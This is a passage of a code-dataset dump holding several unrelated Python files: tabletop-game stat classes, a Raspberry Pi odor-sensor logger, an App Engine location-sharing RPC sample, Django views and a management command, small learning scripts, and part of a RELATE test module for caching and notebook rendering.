H2Protocol(filename)\n)\nreactor.run()\n","sub_path":"client/receive_server_push1.py","file_name":"receive_server_push1.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"562458776","text":"from evennia.utils.ansi import ANSIString\n\nclass StatException(Exception):\n pass\n\nclass StorytellerStat():\n base_name = 'DefaultStat'\n can_context = True\n context = None\n context_length = 80\n category = None\n game_category = None\n sub_category = None\n keywords = []\n multiple_instance = False\n roll_stat = False\n can_specialize = False\n specialties = {}\n always_have = False\n available_ranks = []\n current_ranks = []\n multiple_ranks = False\n init_ranks = [0]\n list_order = 0\n can_favor = 0\n can_supernal = 0\n is_favored = 0\n is_supernal = 0\n owner_store = None\n fill_char = '.'\n\n @property\n def full_name(self):\n if self.context:\n return '%s: %s' % (self.base_name, self.context)\n else:\n return self.base_name\n\n def __repr__(self):\n return '<%s: %s (%s)>' % (self.category, self.full_name, self.max_rank)\n\n @property\n def alt_name(self):\n return self.base_name\n\n @property\n def rank(self):\n return self.max_rank\n\n @property\n def max_rank(self):\n return max(self.ranks)\n\n @property\n def min_rank(self):\n return min(self.ranks)\n\n @property\n def ranks(self):\n return sorted(self.current_ranks)\n\n @property\n def bonus_rank(self):\n return 0\n\n @property\n def owner(self):\n if not self.owner_store:\n return None\n from storyteller.typeclasses.characters import StorytellerCharacter\n results = StorytellerCharacter.objects.filter_family(id=self.owner_store)\n if not results:\n return None\n return 
results[0]\n\n def sheet_format(self, viewer, length=26):\n owner = self.owner\n if not owner:\n from storyteller.typeclasses.characters import StorytellerCharacter\n colors = StorytellerCharacter.st_sheet_colors\n else:\n colors = owner.st_sheet_colors\n if self.supernal:\n favored = ANSIString('{%s+{n' % colors['supernaldot'])\n elif self.favored:\n favored = ANSIString('{%s+{n' % colors['favordot'])\n else:\n favored = ' '\n name_len = 1 + len(self.full_name)\n bonus = self.bonus_rank or 0\n if min([1,self.max_rank]) + min([0, bonus]) + name_len < length:\n if bonus > 0:\n if self.max_rank:\n rank_dots = ('*' * self.max_rank) + ('+' * bonus)\n else:\n rank_dots = 'x' + ('+' * bonus)\n elif bonus < 0:\n if self.max_rank:\n rank_dots = ('-' * max(abs(bonus),self.max_rank)) + ('*' * (min([0, self.max_rank + bonus])))\n else:\n rank_dots = ('-' * max(abs(bonus),self.max_rank)) + 'x'\n else:\n if self.max_rank:\n rank_dots = '*' * self.max_rank\n else:\n rank_dots = 'x'\n else:\n rank_dots = str(self.max_rank + bonus)\n line_dots = self.fill_char * (length - name_len - len(rank_dots))\n return favored + self.full_name + line_dots + rank_dots\n\n def __unicode__(self):\n return unicode(self.full_name)\n\n def __str__(self):\n return str(self.full_name)\n\n def __len__(self):\n return len(str(self))\n\n def __int__(self):\n return self.rank or 0\n\n def __nonzero__(self):\n return True\n\n def __init__(self, owner, start_rank=None, start_context=None):\n from storyteller.typeclasses.characters import StorytellerCharacter\n if not owner.is_typeclass(StorytellerCharacter, exact=False):\n raise StatException(\"'%s' is not a Storyteller Character.\" % owner.key)\n self.owner_store = owner.id\n if start_rank:\n clean_rank = self.val_rank(new_rank=start_rank)\n else:\n clean_rank = self.init_ranks\n self.set_rank(clean_rank)\n if start_context:\n self.set_context(start_context)\n stats = owner.st_stats_db\n if not self.multiple_instance:\n stats = [stat for stat in stats if stat.game_category == self.game_category]\n for stat in stats:\n if stat.__class__ == self.__class__:\n raise StatException(\"'%s' is unique-per-character.\")\n elif self.multiple_instance and not start_context:\n stats = [stat for stat in stats if stat.__class__ == self.__class__ and not stat.context]\n if stats:\n raise StatException(\"'%s' entries require a context beyond one entry.\")\n elif self.multiple_instance and start_context:\n stats = [stat for stat in stats if stat.__class__ == self.__class__ and stat.context]\n stats = [stat for stat in stats if stat.context.lower() == start_context.lower()]\n if stats:\n raise StatException(\"Context entries must be unique per stat.\")\n\n\n def set_context(self, new_context):\n if not self.can_context:\n raise StatException(\"'%s' cannot have a context entry.\" % self.full_name)\n if len(new_context) > self.context_length:\n raise StatException(\"'%s' cannot have a context greater than %s characters.\" % (self.full_name, self.context_length))\n banned_characters = [':', ';', '/', '\\t', '\\n', '(', ')', '[', ']', '{', '}']\n for char in banned_characters:\n if char in new_context:\n raise StatException(\"'%s' context cannot contain a colon, semicolon, forward slash, newline, indent, brackets, curly braces, or parentheses.\")\n self.context = new_context\n\n def set_rank(self, new_rank):\n clean_rank = self.val_rank(new_rank)\n if len(clean_rank) > 1 and not self.multiple_ranks:\n raise StatException(\"'%s' cannot have multiple ranks.\")\n self.current_ranks = clean_rank\n\n def 
add_rank(self, new_rank):\n clean_rank = self.val_rank(new_rank)\n new_ranks = sorted(list(set(clean_rank, self.current_ranks)))\n if len(new_ranks) > 1 and not self.multiple_ranks:\n raise StatException(\"'%s' cannot have multiple ranks.\")\n self.current_ranks = new_ranks\n\n def rem_rank(self, old_rank):\n for rank in old_rank:\n if rank not in self.current_ranks:\n raise StatException(\"'%s' does not have a rank of '%s' to remove.\" % (self.full_name, str(old_rank)))\n\n def val_rank(self, new_rank):\n clean_ranks = []\n for rank in list(new_rank):\n int_rank = int(rank)\n if int_rank not in self.available_ranks:\n raise StatException(\"'%s' can only have the following ranks: '%s'\" % (self.full_name, \", \".join(sorted(self.available_ranks))))\n clean_ranks.append(int_rank)\n return sorted(list(set(clean_ranks)))\n\n @property\n def favored(self):\n return self.is_favored\n\n @property\n def supernal(self):\n return self.is_supernal\n\n def set_favored(self, value):\n if not self.can_favor:\n raise StatException(\"'%s' cannot be favored.\" % self.full_name)\n value = bool(value)\n self.is_favored = value\n\n def set_supernal(self, value):\n if not self.can_supernal:\n raise StatException(\"'%s' cannot be Supernal.\" % self.full_name)\n value = bool(value)\n self.is_supernal = value\n\n\nclass AttributeStat(StorytellerStat):\n base_name = 'DefaultAttribute'\n category = 'Attribute'\n available_ranks = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n roll_stat = True\n always_have = True\n init_ranks = [1]\n can_context = False\n\nclass SkillStat(StorytellerStat):\n base_name = 'DefaultSkill'\n category = 'Skill'\n available_ranks = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n roll_stat = True\n always_have = True\n can_context = False\n\nclass MeritStat(StorytellerStat):\n base_name = 'DefaultMerit'\n category = 'Merit'\n multiple_instance = True\n\nclass PowerStat(StorytellerStat):\n base_name = 'Power'\n category = 'Advantage'\n roll_stat = True\n init_ranks = [1]\n available_ranks = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n @property\n def full_name(self):\n return self.alt_name\n\n @property\n def alt_name(self):\n if self.owner:\n return self.owner.power_stat_name\n else:\n return self.base_name\n\nclass WillpowerStat(StorytellerStat):\n base_name = 'Willpower'\n category = 'Advantage'\n roll_stat = True\n available_ranks = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]","sub_path":"storyteller/stats/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192665966","text":"# coding: utf-8\n\nimport spidev\nimport RPi.GPIO as GPIO\nimport pygame.mixer\nimport time\n\nimport datetime\nimport sqlite3\n\ndbpath = 'logging'\nconnection = sqlite3.connect(dbpath)\nconnection.isolation_level = None\ncursor = connection.cursor()\nsql = \"CREATE TABLE IF NOT EXISTS kusai (t TIMESTAMP, v INT)\"\ncursor.execute(sql)\nconnection.commit()\nconnection.close()\n\nthreshold = 500 #閾値を変えるときはここを変更\n\npygame.mixer.init()\npygame.mixer.music.load(\"/home/pi/Desktop/kusai/kusai.mp3\") #mp3データを変えるときはここを変更\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(17,GPIO.OUT)\nGPIO.setup(22,GPIO.OUT)\n\nspi = spidev.SpiDev()\n\nspi.open(0,0)\n\nspi.max_speed_hz=1000000\n\nspi.bits_per_word=8\n\ndummy = 0xff\nstart = 0x47\nsgl = 0x20\n\nch0 = 0x00\n\nmsbf = 0x08\n\ndef measure(ch):\n ad = spi.xfer2( [ (start + sgl + ch + msbf), dummy ] )\n val = ((ad[0] & 0x03) << 8) + ad[1]\n return val\n\ntry:\n while 1:\n time.sleep(56.88)\n\n 
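# drive GPIO 22 high and give the reading time to settle before sampling ADC channel 0\n 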
GPIO.output(22,True)\n time.sleep(0.72)\n\n ch0_val = measure(ch0)\n Val = 1023 - ch0_val\n time.sleep(0.48)\n GPIO.output(22,False)\n \n GPIO.output(17,True)\n time.sleep(1.92)\n GPIO.output(17,False)\n\n print(Val)\n\n dbpath = 'logging'\n connection = sqlite3.connect(dbpath)\n connection.isolation_level = None\n cursor = connection.cursor()\n sql = \"insert into kusai (t,v)VALUES(datetime('now'), %s)\"%Val\n cursor.execute(sql)\n connection.commit()\n connection.close()\n\n if Val > threshold:\n pygame.mixer.music.play(0)\n\nexcept KeyboardInterrupt:\n pass\n\npygame.mixer.music.stop()\nspi.close()\n","sub_path":"kussa.py","file_name":"kussa.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"363549254","text":"# !/usr/bin/env python\n#\n# Copyright 2008 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Implements the server-side RPCs for the My Hangouts application.\n\nProvides a simple RPC framework for making mostly abstract Python\nfunction calls from JavaScript. Provides a few simple functions for\nthe My Hangouts application.\n\nThis application uses the lower level Datastore API to make datastore\ncalls and perform queries.\n\"\"\"\n\n__author__ = 'Kevin Gibbs'\n\nimport os\nimport logging\nimport datetime\nimport simplejson\nimport wsgiref.handlers\n\nfrom google.appengine.api import datastore\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\n# Renders the main template.\nclass MainPage(webapp.RequestHandler):\n def get(self):\n query = datastore.Query('User')\n current_user = users.GetCurrentUser()\n user_list = {}\n for user in query.Get(100):\n user_list[user['user'].email()] = user['user']\n if current_user:\n user_list[current_user.email()] = current_user\n display_user = self.request.get('user')\n if display_user:\n display_user = users.User(display_user + os.environ['AUTH_DOMAIN'])\n else:\n display_user = current_user\n if len(user_list) > 0 and (not display_user or\n display_user.email() not in user_list):\n display_user = user_list.values()[0]\n template_values = {\n 'users': user_list.values(),\n 'current_user': current_user,\n 'display_user': display_user,\n 'login_url': users.CreateLoginURL(self.request.uri),\n 'logout_url': users.CreateLogoutURL(self.request.uri),\n }\n path = os.path.join(os.path.dirname(__file__), \"myhangouts.html\")\n self.response.out.write(template.render(path, template_values))\n\n# This handler allows the functions defined in the RPCHandler class to\n# be called automatically by remote code.\nclass RPCHandler(webapp.RequestHandler):\n def get(self):\n action = self.request.get('action')\n arg_counter = 0;\n args = ()\n while True:\n arg = self.request.get('arg' + str(arg_counter))\n arg_counter += 1\n if arg:\n args += (simplejson.loads(arg),);\n else:\n break;\n result = getattr(self, action)(*args)\n 
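# serialize the RPC result back to the client as JSON\n 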
self.response.out.write(simplejson.dumps((result)))\n\n # The RPCs exported to JavaScript follow here:\n\n def AddLocation(self, latd, longd, name):\n user = users.GetCurrentUser()\n query = datastore.Query('User')\n query['user ='] = user\n if (query.Count() == 0):\n user_entity = datastore.Entity('User')\n user_entity['user'] = user\n datastore.Put(user_entity)\n location = datastore.Entity(\"Location\")\n location['user'] = user\n location['latd'] = latd\n location['longd'] = longd\n location['name'] = name\n datastore.Put(location)\n # Add a few additional attributes so that they are available to\n # the remote user.\n location['user'] = location['user'].email()\n location['key'] = str(location.key())\n return location\n\n def RemoveLocation(self, key):\n datastore.Delete(datastore.Key(key.encode('utf-8')))\n return True\n\n def GetLocations(self, user_email=None):\n if user_email:\n user = users.User(user_email)\n else:\n user = users.GetCurrentUser()\n query = datastore.Query('Location')\n if not user:\n return []\n query['user ='] = user\n locations = []\n for location in query.Get(100):\n # Add a few additional attributes so that they are available to\n # the remote user.\n location['user'] = location['user'].email()\n location['key'] = str(location.key())\n locations += [location]\n return locations\n\ndef main():\n application = webapp.WSGIApplication([\n ('/', MainPage),\n ('/rpc', RPCHandler),\n ], debug=True)\n wsgiref.handlers.CGIHandler().run(application)\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/app_gallary/myhangouts/myhangouts.py","file_name":"myhangouts.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291200271","text":"from hlwtadmin.models import Artist, GigFinderUrl, GigFinder, ConcertAnnouncement, Venue, Location, Organisation, Country, Concert, RelationConcertOrganisation, Location\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom pandas import read_excel\nfrom json import load, dump\nfrom codecs import open\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n i = 1\n for organisation in Organisation.objects.filter(name__icontains=\"unknown\"):\n for rel in RelationConcertOrganisation.objects.filter(organisation=organisation):\n concert = rel.concert\n for ca in concert.concertannouncements():\n if \"songkick\" in ca.gigfinder.name and ca.is_festival:\n raw_venue = ca.raw_venue\n venue_organisation = raw_venue.organisation\n if venue_organisation and \"unknown\" not in venue_organisation.name.lower():\n line = [str(i), \"concert\", str(concert), str(concert.pk), \"with organisation\", str(organisation), str(organisation.pk), \"has ca\", str(ca), str(ca.pk), \"with raw venue\", str(raw_venue), str(raw_venue.pk), \"which has organisation\", str(venue_organisation), str(venue_organisation.pk) if venue_organisation else str(None)]\n print(\"\\t\".join(line))\n i += 1\n rel.organisation = venue_organisation\n rel.save()\n","sub_path":"hlwtadmin/management/commands/resolve_unknown_venues_for_known_venues.py","file_name":"resolve_unknown_venues_for_known_venues.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"607178521","text":"def ehPrimo(k):\n\ti = 0\n\tx = 0\n\twhile i <= k:\n\t\ti += 1\n\t\tif (k % i) == 0:\n\t\t\tx += 1\n\tif x == 2:\n\t\treturn k\n\t\ndef 
maior_primo(num):\n\ti = 0\n\twhile i <= 2:\n\t\tif ehPrimo(num) == num:\n\t\t\treturn num\n\t\telse:\n\t\t\tnum -= 1\n\n\nn = int(input(\"Digite um número inteiro: \"))\nprint(maior_primo(n))","sub_path":"week_05_ex_02.py","file_name":"week_05_ex_02.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108742816","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 5 13:11:18 2017\n\n@author: giova\n\"\"\"\n\n\"\"\"\nCreated on Sun Jul 2 10:11:08 2017\n\n@author: giova\n\"\"\"\n\n# Import libraries\nimport numpy as np\nimport pandas as pd\nfrom time import time\nfrom sklearn.metrics import f1_score\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn import datasets\n\n# Read student data\niris = datasets.load_iris()\nprint(\"Student data read successfully!\")\nX=iris.data[:,[2,3]]\ny=iris.target\n\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.3, random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nsc.fit(X_train)\nX_train_std = sc.transform(X_train)\nX_test_std = sc.transform(X_test)\n\ndef plot_decision_regions(X, y, classifier, test_idx=None, resolution=0.02):\n markers=('s','x','o','^','v')\n colors=('red','blue','lightgreen','gray','cyan')\n cmap=ListedColormap(colors[:len(np.unique(y))])\n \n x1_min, x1_max=X[:,0].min() -1, X[:,0].max()+1\n x2_min, x2_max=X[:,1].min() -1, X[:,1].max()+1\n \n xx1,xx2 =np.meshgrid(np.arange(x1_min,x1_max,resolution),np.arange(x2_min,x2_max,resolution))\n \n z=classifier.predict(np.array([xx1.ravel(),xx2.ravel()]).T)\n z=z.reshape(xx1.shape)\n plt.contourf(xx1,xx2,z,alpha=0.4,cmap=cmap)\n plt.xlim(xx1.min(),xx1.max())\n plt.ylim(xx2.min(),xx2.max())\n \n \n \n\nfrom sklearn.tree import DecisionTreeClassifier\ntree = DecisionTreeClassifier(max_depth=3, random_state = 0)\ntree.fit(X_train, y_train)\nX_combined = np.vstack((X_train, X_test))\ny_combined = np.hstack((y_train, y_test))\nplot_decision_regions(X_combined, y_combined, classifier=tree, test_idx=range(105,150))\nplt.xlabel('petal length')\nplt.ylabel('petal width')\nplt.legend(loc='upper left')\nplt.show()\n\n\n'''\n# Print the results\nprint(\"Total number of students: {}\".format(n_students))\nprint(\"Number of features: {}\".format(n_features))\nprint(\"Number of students who passed: {}\".format(n_passed))\nprint(\"Number of students who failed: {}\".format(n_failed))\nprint(\"Graduation rate of the class: {:.2f}%\".format(grad_rate))\n'''\n\n\n\n'''\n# Show the list of columns\nprint(\"Feature columns:\\n{}\".format(feature_cols))\nprint(\"\\nTarget column: {}\".format(target_col))\n'''\n\n# Separate the data into feature data and target data (X_all and y_all, respectively)\n\n\n\n'''\n# Show the feature information by printing the first five rows\nprint(\"\\nFeature values:\")\nprint(X_all.head())'''\n\n\n'''View data correlation'''\n'''import matplotlib.pyplot as plt\nplt.figure()\n\ncolors=['pink' if i=='yes' else 'skyblue' for i in y_all]\nmarkers=['D' if i=='yes' else 'o' for i in y_all]\nfor x,y, c, m in zip(X_all['age'], X_all['Medu'], colors, markers):\n plt.scatter(x,y,alpha=0.8, c=c, marker=m)\nplt.title(\"yohoo\")\nplt.xlabel(\"yooohoo\")\nplt.ylabel('prices')\nplt.show()'''\n\n# TODO: Import 'GridSearchCV' and 'make_scorer'\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import make_scorer\nfrom 
sklearn.model_selection import KFold\n\n'''k-fold creation'''\nn_splits = 4\nkf = KFold(n_splits = n_splits, shuffle=True, random_state=42)\n\n'''scorer creation'''\nf1_scorer = make_scorer(f1_score, pos_label='yes')\n\ndef train_classifier(clf, X_train, y_train):\n \n start = time()\n clf.fit(X_train,y_train)\n end= time()\n \n print(\"Trained in {:.4f} seconds\".format(end-start))\n\ndef predict_labels(clf, features, target):\n y_pred=clf.predict(features)\n return f1_score(target.values, y_pred,pos_label='yes')\n\n''' select model '''\nfrom sklearn.tree import DecisionTreeClassifier\nclf_A = DecisionTreeClassifier(random_state=41)","sub_path":"irs_dataset.py","file_name":"irs_dataset.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"536814148","text":"from django.http import JsonResponse, HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom bgapp.bgModels import *\nfrom django.core import exceptions\nfrom .view_utils import *\nfrom django.shortcuts import render\nfrom .stats import get_topics_Latency, get_user_topics_Latency\n\nimport logging\nlog = logging.getLogger('batground')\n\n@csrf_exempt\n@get_topics_Latency.time()\ndef get_topics(request):\n req = json.loads(request.body.decode('utf-8'))\n try:\n user_db = User.objects.get(userID__exact=req['user_id'])\n except exceptions.ObjectDoesNotExist:\n return JsonResponse({'topics': []})\n\n if not req['input']:\n topic_suggestions = get_popular_topics()\n else:\n topic_suggestions = get_topic_suggestions(req['input'].strip())[:options_per_page]\n\n json_content = {\n 'topics': [], # [ ['topic', pro, con], ... ]\n }\n\n for topic in topic_suggestions:\n json_content['topics'].append(\n [topic.content,\n topic.camp(True).users\n .exclude(userID=user_db.userID)\n .exclude(isOnline=False)\n .count(),\n topic.camp(False).users\n .exclude(userID=user_db.userID)\n .exclude(isOnline=False)\n .count()\n ]\n )\n\n response = JsonResponse(json_content)\n return response\n\n\n@csrf_exempt\n@get_user_topics_Latency.time()\ndef get_user_topics(request):\n req = json.loads(request.body.decode('utf-8'))\n try:\n user_db = User.objects.get(userID__exact=req['user_id'])\n except exceptions.ObjectDoesNotExist:\n return JsonResponse({'topics': []})\n\n user_opinions = user_db.opinions.filter(isDeleted=False)\n json_content = {\n 'topics': [] # [ [topics, position], ... 
]\n }\n for opinion in user_opinions:\n json_content['topics'].append(\n [opinion.topic.content, opinion.position]\n )\n\n response = JsonResponse(json_content)\n return response\n\n@csrf_exempt\ndef itsme(request):\n return HttpResponse('Hi, long duong')\n","sub_path":"bgapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"464788658","text":"from django.contrib.auth import authenticate, login\nfrom django.http import HttpResponse\nfrom WebAttendance.login.models import LoginForm\nfrom WebAttendance.InputHandler.models import transaction_record\nfrom django.shortcuts import render_to_response\nfrom models import SearchForm\nfrom django.core.exceptions import ObjectDoesNotExist\n\ndef login_view(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n username= form.cleaned_data['username']\n password= form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n search_form= SearchForm()\n return render_to_response('userpage.html',{'username': username,\n 'search_form': search_form})\n else:\n return HttpResponse(\"Bye, world.\")\n else:\n return HttpResponse(\"TotalFail\")\n if request.method == 'GET':\n form= SearchForm(request.GET)\n trans_id= form.data['id']\n try:\n b=get_data(trans_id)\n gateway_id=b.gateway_id\n trans_num=b.trans_num\n time_stamp=b.time_stamp\n vids=b.valid_ids\n ivids=b.invalid_ids\n vids=vids.split(\",\")\n ivids= ivids.split(\",\")\n except ObjectDoesNotExist:\n vids=[]\n ivids=[]\n gateway_id= \"N/A\"\n trans_num=\"DOES NOT EXIST\"\n time_stamp=\"\"\n \n \n\n search_form= SearchForm()\n return render_to_response('results.html',{'username': \"ted\",\n 'search_form': search_form,\n 'gateway_num':gateway_id,\n 'trans_num':trans_num,\n 'time_stamp':time_stamp,\n 'vids':vids, \n 'ivids': ivids}) \n \n\n \ndef get_data( trans_num):\n b=transaction_record.objects. get(trans_num=trans_num)\n return b\n\ndef create_token_response(model):\n tokens= str(model).split()\n return tokens\n \n","sub_path":"WebAttendance/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"389073159","text":"from __future__ import division\n\n__copyright__ = \"Copyright (C) 2017 Dong Zhuang\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nimport json\nfrom django.test import TestCase\nfrom tests.base_test_mixins import (\n improperly_configured_cache_patch, SingleCoursePageTestMixin)\nfrom tests.test_sandbox import SingleCoursePageSandboxTestBaseMixin\nfrom tests.utils import mock\n\n\nclass SingleCoursePageCacheTest(SingleCoursePageTestMixin, TestCase):\n\n @classmethod\n def setUpTestData(cls): # noqa\n super(SingleCoursePageCacheTest, cls).setUpTestData()\n cls.c.force_login(cls.student_participation.user)\n cls.start_flow(cls.flow_id)\n\n @improperly_configured_cache_patch()\n def test_disable_cache(self, mock_cache):\n from django.core.exceptions import ImproperlyConfigured\n with self.assertRaises(ImproperlyConfigured):\n from django.core.cache import cache # noqa\n\n def test_view_flow_with_cache(self):\n resp = self.c.get(self.get_page_url_by_ordinal(0))\n self.assertEqual(resp.status_code, 200)\n self.c.get(self.get_page_url_by_ordinal(1))\n\n with mock.patch(\"course.content.get_repo_blob\") as mock_get_repo_blob:\n resp = self.c.get(self.get_page_url_by_ordinal(0))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(mock_get_repo_blob.call_count, 0)\n\n def test_view_flow_with_cache_improperly_configured(self):\n resp = self.c.get(self.get_page_url_by_ordinal(0))\n self.assertEqual(resp.status_code, 200)\n self.c.get(self.get_page_url_by_ordinal(1))\n\n with improperly_configured_cache_patch():\n resp = self.c.get(self.get_page_url_by_ordinal(0))\n self.assertEqual(resp.status_code, 200)\n\n\n# {{{ Test Nbconvert for rendering ipynb notebook\n\nQUESTION_MARKUP_FULL = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\") }}\n\"\"\"\n\nQUESTION_MARKUP_SLICED1 = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", indices=[0, 1, 2]) }}\n\"\"\"\n\nQUESTION_MARKUP_SLICED2 = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", indices=[1, 2]) }}\n\"\"\"\n\nQUESTION_MARKUP_CLEAR_MARKDOWN = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", clear_markdown=True) }}\n\"\"\"\n\nQUESTION_MARKUP_CLEAR_OUTPUT = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", clear_output=True) }}\n\"\"\"\n\nQUESTION_MARKUP_CLEAR_ALL = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", clear_markdown=True, clear_output=True) }}\n\"\"\"\n\nMARKDOWN_PLACEHOLDER = \"wzxhzdk\"\n\nTEST_IPYNB_BYTES = json.dumps({\n \"cells\": [\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"# First Title of Test NoteBook\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": 1,\n \"metadata\": {\n \"scrolled\": True\n },\n \"outputs\": [\n {\n \"name\": \"stdout\",\n \"output_type\": \"stream\",\n \"text\": [\n \"This is function1\\n\"\n ]\n }\n ],\n \"source\": [\n \"def function1():\\n\",\n \" print(\\\"This is function1\\\")\\n\",\n \"\\n\",\n \"function1()\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"# Second 
Title of Test NoteBook\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": 2,\n \"metadata\": {\n \"collapsed\": True\n },\n \"outputs\": [],\n \"source\": [\n \"def function2():\\n\",\n \" print(\\\"This is function2\\\")\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": 3,\n \"metadata\": {},\n \"outputs\": [\n {\n \"name\": \"stdout\",\n \"output_type\": \"stream\",\n \"text\": [\n \"This is function2\\n\"\n ]\n }\n ],\n \"source\": [\n \"function2()\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": None,\n \"metadata\": {\n \"collapsed\": True\n },\n \"outputs\": [],\n \"source\": [\n \"print(`5**18`)\"\n ]\n }\n ],\n \"metadata\": {\n \"kernelspec\": {\n \"display_name\": \"Python 3\",\n \"language\": \"python\",\n \"name\": \"python3\"\n },\n \"language_info\": {\n \"codemirror_mode\": {\n \"name\": \"ipython\",\n \"version\": 3\n },\n \"file_extension\": \".py\",\n \"mimetype\": \"text/x-python\",\n \"name\": \"python\",\n \"nbconvert_exporter\": \"python\",\n \"pygments_lexer\": \"ipython3\",\n \"version\": \"3.5.0\"\n }\n },\n \"nbformat\": 4,\n \"nbformat_minor\": 2\n}).encode()\n\nFIRST_TITLE_TEXT = \"First Title of Test NoteBook\"\nSECOND_TITLE_TEXT = \"Second Title of Test NoteBook\"\nTEXT_CELL_HTML_CLASS = \"text_cell_render\"\nCODE_CELL_HTML_CLASS = \"code_cell\"\nCODE_CELL_IN_STR_PATTERN = '
    In[%s]:
